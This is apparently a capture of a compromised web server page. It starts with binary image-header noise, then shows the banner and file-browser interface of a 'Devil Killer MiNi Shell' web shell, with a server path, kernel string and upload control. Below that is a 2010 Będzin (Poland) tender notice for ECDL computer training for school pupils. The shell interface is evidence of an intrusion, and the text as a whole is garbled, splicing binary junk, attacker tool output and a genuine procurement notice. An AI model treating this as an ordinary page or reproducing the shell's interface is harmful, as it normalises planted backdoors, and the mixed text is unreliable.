JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100910/287094-N-2010.html

<p class="kh_header"><b>Będzin: Przygotowanie i przeprowadzenie szkoleń komputerowych Europejskie Komputerowe Prawo Jazdy (ECDL) z 7 egzaminami  dla uczestników projektu Wygraj swoją przyszłość, realizowanego przez miasto Będzin w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1: Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 287094 - 2010; data zamieszczenia: 10.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Będzina , ul. 11 Listopada 20, 42-500 Będzin, woj. śląskie, tel. 032 267-35-16, faks (032) 267 62 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie szkoleń komputerowych Europejskie Komputerowe Prawo Jazdy (ECDL) z 7 egzaminami  dla uczestników projektu Wygraj swoją przyszłość, realizowanego przez miasto Będzin w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1: Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa polegająca na przygotowaniu i przeprowadzeniu szkoleń komputerowych Europejskie Komputerowe Prawo Jazdy (ECDL) z 7 egzaminami  w ramach projektu Wygraj swoją przyszłość realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1: Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup  o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanym ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego.
W szkoleniu uczestniczyć będzie 240 uczniów 6 gimnazjów prowadzonych przez miasto Będzin: 120 uczniów w roku szkolnym 20102011 i  120 uczniów - w 20112012.  Projekt obejmuje łącznie 2880 godzin szkoleń.

W skład przedmiotu zamówienia wchodzą następujące szkolenia:
Szkolenie Europejskie Komputerowe Prawo Jazdy (ECDL) z 7 egzaminami  obejmujące 120 godzin zajęć w roku szkolnym dla 10-osobowej grupy uczniów z 6 gimnazjów prowadzonych przez miasto Będzin.  Zajęcia umożliwią zdobycie kwalifikacji i umiejętności  ICT w stopniu co najmniej średniozaawansowanym. 
W ramach szkolenia należy przeprowadzić cykl 7 egzaminów, których zdanie będzie uprawniało do uzyskania uznawanego w całej Europie certyfikatu ECDL, potwierdzającego nabyte umiejętności.
W roku szkolnym 2010 2011 od października 2010 roku do czerwca 2011 roku należy zaplanować 120-godzinne szkolenia dla dwunastu 10-osobowych grup (po 2 grupy w każdym gimnazjum) zakończone egzaminami.
W roku szkolnym 2011 2012 od września 2011 roku do czerwca 2012 roku należy zaplanować 120-godzinne szkolenia dla dwunastu 10-osobowych grup (po 2 grupy w każdym gimnazjum) zakończone egzaminami.

Informacja na temat zakresu merytorycznego szkoleń ECDL z 7 egzaminami (120 godzin)
1.	Podstawy technik informatycznych.
1)	Pojęcia podstawowe (sprzęt, oprogramowanie, technologia informacyjna)
2)	Typy komputerów (mainframe, stacja robocza, PC, laptop, notebook, PDA ze względu na szybkość pracy, wydajność, koszt i rodzaje użytkowników)
3)	Podstawowe elementy PC (procesor (CPU), dysk twardy, podstawowe urządzenia wejścia i wyjścia, typy pamięci)
4)	Urządzenia peryferyjne (mysz, klawiatura, joystick, skaner, panel dotykowy, kamera cyfrowa, mikrofon)
5)	Wydajność komputera (szybkość procesora, wielkość pamięci i dysków, jednostki)
6)	Pamięci masowe (dyskietka, dyski, ZIP, CD-ROM, taśmy magnetyczne (cartridges), zewnętrzne i wewnętrzne dyski twarde z uwzględnieniem szybkości dostępu do danych, pojemności i kosztów tych urządzeń.
7)	Oprogramowanie (typy oprogramowania, różnice pomiędzy systemami operacyjnymi i oprogramowaniem użytkowym)
8)	Sieci komputerowe (LAN, WAN, architektura klient-serwer, zasoby sieciowe, Internet, Intranet, Extranet)
9)	Pojęcia związane z www.
10)	Sieci telefoniczne i komputery (modem, ISDN, ADSL)
11)	Zastosowanie komputerów w życiu codziennym
12)	Poczta elektroniczna i jej zastosowania.
13)	Bezpieczeństwo systemów informatycznych

2.	Użytkowanie komputerów
1)	Środowisko pracy (uruchamianie i zamykanie komputera, menu start, praca                         z aplikacjami, okno programu)
2)	Otwieranie plików, katalogów (folderów),
3)	Zarządzanie plikami (pojęcie pliku, folderu, tworzenie, otwieranie i zapisywanie plików, praca z folderami właściwości plików i folderów, wyszukiwanie zasobów dyskowych, kopiowanie)
4)	Wirusy (podstawowe pojęcia, zagrożenia, programy antywirusowe)
5)	Drukowanie (pojęcie drukarki, instalacja, podgląd wydruku, wydruk)

3.	Przetwarzanie tekstów 
1)	Zastosowania programu
2)	Okno programu 
3)	Tworzenie i zapisywanie nowego dokumentu, otwieranie i zamykanie utworzonych plików 
4)	Wykorzystanie pomocy edytora tekstu.
5)	Widoki dokumentów
6)	Zasady wprowadzania tekstu
7)	Formatowanie tekstów (czcionka, akapit, style, odstępy między wierszami, wyrównywanie tekstu) 
8)	Kopiowanie, wycinanie i wklejanie tekstów
9)	Wyszukiwanie i zamiana fragmentów tekstu
10)	Punktatory (wstawianie, formatowanie, usuwanie, listy wielopoziomowe)
11)	Układ strony (orientacja, marginesy, rozmiar)
12)	Nagłówek i stopka strony (numeracja stron)
13)	Wstawianie i formatowanie tabeli
14)	Wstawianie elementów graficznych 
15)	Korespondencja seryjna (zastosowania, tworzenie)
16)	Wydruk dokumentów (podgląd wydruku, opcje drukowania)
17)	Sprawdzanie poprawności ortograficznej i gramatycznej

4.	Arkusze kalkulacyjne 
1)	Zastosowania programu
2)	Okno programu
3)	Tworzenie i zapisywanie nowego dokumentu, otwieranie i zamykanie utworzonych plików 
4)	Wykorzystanie pomocy arkusza kalkulacyjnego
5)	Pojęcie komórki (wprowadzanie i modyfikacja danych, zaznaczanie)
6)	Praca z wierszami i kolumnami (wstawianie, usuwanie, zaznaczanie, zmiana rozmiaru)
7)	Kopiowanie, przenoszenie, usuwanie komórek
8)	Sortowanie danych 
9)	Praca z arkuszami (wstawianie, przenoszenie, kopiowanie, zamiana nazwy, usuwanie)
10)	Wstawianie formuł i funkcji (pojęcie formuły, wpisywanie formuł, wykorzystanie wbudowanych funkcji)
11)	Adresy komórek (adres względny, bezwzględny i mieszany)
12)	Formatowanie komórek (typowe formaty, formatowanie warunkowe)
13)	Tworzenie wykresów (kreator wykresów, typy wykresów, modyfikacja istniejących wykresów)
14)	Wydruk dokumentu (podgląd, parametry i opcje wydruku)

5.	Bazy danych 
1)	Zastosowania programu
2)	Teoria baz danych (pojęcia podstawowe - tabela, rekord, kolumna, typy danych, klucz podstawowy, relacje)
3)	Okno programu
4)	Tworzenie nowych baz danych
5)	Wykorzystanie pomocy
6)	Tworzenie tabel (kreator tabel, szablony, właściwości pól)
7)	Praca z tabelami (dodawanie, modyfikacja i usuwanie rekordów, sortowanie danych)
8)	Definiowanie relacji między tabelami (typy relacji, warunki ich tworzenia, tworzenie)
9)	Wyszukiwanie danych za pomocą filtrów
10)	Tworzenie kwerend (typy kwerend, tworzenie, modyfikacja i usuwanie, kryteria wyszukiwania)
11)	Formularze (tworzenie, modyfikacja i usuwanie formularzy, praca z formularzem, zastosowanie filtrów w formularzach)
12)	Raporty (tworzenie, modyfikacja i usuwanie, drukowanie).

6.	Grafika menedżerska i prezentacyjna 
1)	Zastosowania programu do tworzenia prezentacji
2)	Okno programu
3)	Podstawowe zasady tworzenia dobrej prezentacji
4)	Wykorzystanie pomocy w programie
5)	Tworzenie nowej prezentacji z zastosowaniem wbudowanych szablonów
6)	Slajdy (dodawanie nowych slajdów, zmiana układu, wpisywanie treści)
7)	Definiowanie wzorca slajdu 
8)	Formatowanie treści slajdu (pola tekstowe, czcionka, styl, kolory, wyrównanie)
9)	Wstawianie obrazów, zdjęć, plików zewnetrznych
10)	Wstawianie wykresów, tabel, autokształtów, diagramów, schematów organizacyjnych
11)	Kopiowanie, przenoszenie, usuwanie elementów prezentacji
12)	Wprowadzanie animacji (animacje wbudowane, efekty, przejścia slajdów)
13)	Przygotowanie pokazu slajdów (sposoby prezentacji, notatki)
14)	Drukowanie prezentacji 
15)	Uruchamianie prezentacji (pokaz slajdów, poruszanie się pomiędzy slajdami).

7.	Usługi w sieciach informatycznych - internet i poczta elektroniczna
1)	Podstawowe pojęcia i zasady (HTTP, URL, hiperłącze, ISP, FTP)
2)	Budowa adresu www
3)	Przeglądarka stron internetowych (zastosowania, przykładowe aplikacje, uruchamianie, okno programu)
4)	Otwieranie stron internetowych (wpisywanie adresu, poruszanie się po stronie www, odświeżanie, powrót do wcześniej oglądanych stron)
5)	Organizacja pracy w przeglądarce (podstawowe ustawienia, ulubione, historia)
6)	Zagrożenia i bezpieczeństwo pracy w Internecie (podstawowe zagrożenia, bezpieczne strony www, certyfikaty stron)
7)	Wyszukiwanie informacji (wyszukiwarki internetowe, przykładowe strony, wyszukiwanie zaawansowane)
8)	Pobieranie informacji z Internetu (kopiowanie tekstów, obrazów, plików multimedialnych)
9)	Wydruk treści strony internetowej
10)	Podstawy poczty elektronicznej (zastosowania, zalety, programy pocztowe)
11)	Adres e-mail (budowa, przykładowe adresy)
12)	Znajomość dobrych zwyczajów w sieci
13)	Okno programu pocztowego
14)	Tworzenie i wysyłanie nowej poczty (adres, temat, treść, załączniki)
15)	Praca z pocztą przychodzącą (otwieranie poczty, drukowanie, odpisywanie, przesyłanie dalej, organizacja poczty elektronicznej, wyszukiwanie listów                      od wybranego nadawcy)
16)	Książka adresowa
17)	Bezpieczeństwo poczty elektronicznej (załączniki, nieznany nadawca, podpis                         i szyfrowanie poczty).

Szczegółowy zakres zamówienia przedstawia załącznik nr 7 do SIWZ.

Zamawiający wymaga, aby Wykonawca posiadł zaświadczenie podmiotu udzielającego certyfikacji programów szkoleń pod kątem zgodności ich zakresu z wymaganiami międzynarodowego Europejskiego Certyfikatu Umiejętności Komputerowych (ECDL) potwierdzające, iż wykonawca spełnia określone wymogi merytoryczne proponowanych programów szkoleń zgodnie  z certyfikacją ECDL oraz posiada status Centrum Egzaminacyjnego ECDL  i Laboratorium ECDL..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępując do udziału w postępowaniu  obowiązany jest wnieść wadium w PLN stosownie do art.45 i następne ustawy Prawo zamówień publicznych 
( tj. Dz. U z 2007r. Nr 223 poz. 1655 ze zm. ) w wysokości: 15 000,00zł ( słownie: piętnaści tysięcy złotych 00/100) 
2.Wykonawca wnoszący wadium w formie pieniężnej winien przelać je na konto: 
ING Bank Śląski S.A O/Będzin nr 44 1050 1142 1000 0023 0074 0087 z dopiskiem Wadium na zadanie:  Przygotowanie i przeprowadzenie szkoleń komputerowych Europejskie Komputerowe Prawo Jazdy (ECDL) z 7 egzaminami  
3.W przypadku wniesienia wadium w  formach niepieniężnych, oryginał wadium należy złożyć w Urzędzie  Miejskim w Będzinie Biuro Zamówień Publicznych pok.117 ul. 11 Listopada 20, 42-500 Będzin.
4.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)pieniądzu, UWAGA! Za termin  wniesienia wadium w tej formie uważa się termin wpływu środków pieniężnych na konto Zamawiającego.
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)   gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. Zm.).
5.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku  bankowym.
6. Wadium wnosi się przed upływem terminu składania ofert.
7. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego
oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a. ustawy Pzp.
8.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
9.Zamawiajacy zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono
wadium na podstawie pkt 7  niniejszej części SIWZ , jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
12.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono  przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się: 
wykazania wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie.

Wykonawca winien wykazać  co najmniej:
a)	2 usług  szkoleniowych, których przedmiotem była organizacja i przeprowadzenie szkoleń informatycznych  o wartości minimum 300.000 zł (trzysta tysięcy złotych) brutto każda.
b)	1 usługi szkoleniowej, której  przedmiotem była organizacja i przeprowadzenie szkoleń i egzaminów Europejskiego Certyfikatu Umiejętności Komputerowych (ECDL) o wartości minimum 300.000 zł (trzysta tysięcy złotych) brutto oraz była adresowana do osób poniżej 24 roku życia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się:
wykazania osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją
o podstawie do dysponowania tymi osobami.
Wykonawca musi wykazać dysponowanie:
a) minimum sześcioma osobami posiadającymi certyfikat ECDL Advanced na 
                  stanowisku trenera w zakresie prowadzenia szkoleń ECDL,
b) minimum dwiema osobami posiadającymi doświadczenie i wiedzę  w zakresie 
                 organizacji szkoleń w ramach funduszy europejskich na stanowisku kierownika 
                 projektu i specjalisty ds. organizacji szkoleń, których kompetencje w zakresie 
                 problematyki funduszy europejskich zostały zweryfikowane przez zewnętrzną 
                 jednostkę certyfikującą,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp.
2.Wypełniony czytelnie, podpisany  przez Wykonawcę formularz ofertowy.
UWAGA !  Na formularzu ofertowym należy ujawnić wszystkie podmioty składające ofertę wspólną z zaznaczeniem np. konsorcjum. 
3. Pełnomocnictwo w sytuacjach, w których uprawnienie do podpisania oferty nie wynika z zapisu we właściwym rejestrze lub ewidencji, w tym wynikające z art. 23  ust.2ustawy Pzp. 
4. Harmonogram rzeczowo-finansowy realizacji zadania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie możliwość dokonania zmian w umowie w przypadkach i na
warunkach jak niżej:
1.1 Zmiana terminu realizacji zamówienia może nastąpić w przypadku opóźnień wynikających z:
-przestojów i opóźnień zawinionych przez Zamawiającego,
-działania siły wyższej ( np. klęski żywiołowe, strajki generalne lub lokalne, zjawiska gospodarcze lub pogodowe) w pełni niezależnej od Stron umowy, mającej bezpośredni wpływ na termin wykonania,
